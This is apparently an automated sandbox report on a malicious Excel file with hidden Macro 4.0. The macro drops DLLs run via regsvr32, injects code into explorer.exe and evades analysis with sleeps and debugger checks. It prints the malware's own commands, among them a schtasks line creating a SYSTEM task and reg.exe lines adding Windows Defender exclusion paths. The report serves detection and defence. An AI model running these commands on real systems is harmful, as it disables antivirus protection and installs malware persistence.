Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009D4B6 push FFFFFF8Ah; iretd 5_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00099D5C push cs; iretd 5_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00099E5E push cs; iretd 5_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0009BB29 push esi; iretd 5_2_0009BB2E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi 8_2_005E2D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi 8_2_005E2E73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi 8_2_005E336F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], ebp 8_2_005E33F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push edi; mov dword ptr [esp], 00000004h 8_2_005E340B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], edx 8_2_005E346C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], esi 8_2_005E276D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi 8_2_005E288F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], ebx 8_2_005E28C3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi 8_2_005E2B65
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp 8_2_005E376E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], edx 8_2_005E3A0E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi 8_2_005E3B55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push esi; mov dword ptr [esp], 00000001h 8_2_005E3D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ecx 8_2_005E3D9C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp 8_2_005E3E46
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi 8_2_005E3E72
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi 8_2_005E3F52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp 8_2_005E3F76
PE file contains sections with non-standard names
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name: .rdatat
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name: .rdatat
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: 44466.7516903935[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name: .rdatat
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name: .rdatat
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name: .rdatat
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd1.red.11.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name: .rdatat
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd.red.14.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name: .rdatat
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_100030B7 StartServiceCtrlDispatcherA, 12_2_100030B7

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2124 base: DF102D value: E9 BA 4C 29 FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2988 base: DF102D value: E9 BA 4C 2F FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2544 base: DF102D value: E9 BA 4C 29 FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 284 base: DF102D value: E9 BA 4C 2F FF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2088 Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 840 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2692 Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2904 Thread sleep count: 71 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2536 Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2936 Thread sleep count: 63 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2936 Thread sleep time: -104000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2116 Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2428 Thread sleep count: 99 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2952 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908 Thread sleep count: 2670 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908 Thread sleep count: 2578 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2670
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2578
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW, 4_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW, 5_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW, 8_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW, 11_2_000EAEB4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW, 12_2_1000AEB4

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 4_2_10005F82
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_005E4495 or ebx, dword ptr fs:[00000030h] 8_2_005E4495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_001D4495 or ebx, dword ptr fs:[00000030h] 12_2_001D4495
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00085A61 RtlAddVectoredExceptionHandler, 5_2_00085A61

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2124 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2124 base: DF102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2988 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2988 base: DF102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2544 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2544 base: DF102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 284 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 284 base: DF102D value: E9
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Compensation-2308017-09272021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_000831C2 CreateNamedPipeA, 5_2_000831C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 4_2_1000980C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 4_2_1000D01F